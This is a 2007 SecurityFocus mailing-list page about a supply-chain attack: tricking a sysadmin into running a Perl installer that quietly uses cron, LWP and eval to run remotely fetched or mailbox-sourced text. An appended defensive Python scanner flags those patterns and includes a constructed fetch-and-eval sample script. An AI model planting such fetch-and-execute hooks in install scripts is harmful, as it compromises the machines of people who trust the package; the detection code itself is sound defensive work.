Vuln Dev
Re: Vulnerability Disclosure Jun 07 2007 12:21PM
Jonathan Leffler (jleffler us ibm com) (1 replies)
Re: Vulnerability Disclosure Jun 08 2007 05:10PM
Valdis Kletnieks vt edu (2 replies)
Re: Vulnerability Disclosure Jun 16 2007 07:36PM
Lincoln Yeoh (lyeoh pop jaring my)
At 01:10 AM 6/9/2007, Valdis.Kletnieks (at) vt (dot) edu wrote:

>The *real* attack vector here is "Can you, as an outsider, get the sysadmin
>to run an installer script that *looks* OK at first glance, but ends up
>doing something untoward by abusing the setup.exe that the sysadmin sees
>in the script but doesn't actually look closely at"?

Sure.

Install notes:

perl Makefile.PL
make
make test
make install

If you look at the Windows malware - a lot of attackers don't even
care about getting "admin", just normal user privileges are good
enough to do what they want (zombies to send spam, DoS, etc).

cron jobs + LWP + Google + eval = fun, right?

Could always look in ~/Maildir etc for "Spam" to eval too.

Have a nice day ;).
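
Added example, not part of the original post: a pre-install check, sketched in Python, that reads a Perl install script such as Makefile.PL before anyone types the commands above and flags the behaviours the post names (string eval, network fetches, cron, mail spool reads). The rule set, the function names audit and verdict, and both sample scripts are assumptions constructed for illustration.

```python
import re

# Heuristic rules for the behaviours named in the post (an assumed, non-exhaustive set).
RULES = {
    # String eval runs data as code; the block form `eval { ... }` is only exception handling.
    "string-eval": re.compile(r"\beval\b(?!\s*\{)"),
    "network-fetch": re.compile(r"\b(?:LWP::\w+|HTTP::Tiny|IO::Socket::INET)\b"),
    "cron": re.compile(r"\bcrontab\b|/etc/cron|/var/spool/cron"),
    "mail-read": re.compile(r"Maildir|/var/mail"),
}
# Data sources an outsider can influence; pairing one with string eval is the pattern to block.
UNTRUSTED_SOURCES = {"network-fetch", "mail-read"}


def audit(source):
    """Return {rule name: [line numbers]} for one Perl install script."""
    findings = {}
    for lineno, line in enumerate(source.splitlines(), start=1):
        if line.lstrip().startswith("#"):  # skip full-line comments
            continue
        for name, pattern in RULES.items():
            if pattern.search(line):
                findings.setdefault(name, []).append(lineno)
    return findings


def verdict(findings):
    """'block' when untrusted input can reach eval, 'review' on any hit, else 'clean'."""
    if "string-eval" in findings and UNTRUSTED_SOURCES.intersection(findings):
        return "block"
    return "review" if findings else "clean"


# Constructed samples, not taken from any real distribution.
BENIGN = '''use ExtUtils::MakeMaker;
eval { require Some::Optional; };
WriteMakefile(NAME => "Demo");
'''
SUSPECT = '''use ExtUtils::MakeMaker;
use LWP::Simple;
my $extra = get("http://example.invalid/opts");
eval $extra;
WriteMakefile(NAME => "Demo");
'''

if __name__ == "__main__":
    for label, text in (("benign", BENIGN), ("suspect", SUSPECT)):
        result = audit(text)
        print(label, verdict(result), result)
```

A "clean" result is not a guarantee: obfuscated code and logic inside modules the script loads are out of reach of line-based matching, so untrusted builds still belong under an unprivileged, throwaway account.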

Re: Vulnerability Disclosure Jun 08 2007 05:33PM
Jonathan Leffler (jleffler us ibm com)


 

Copyright 2010, SecurityFocus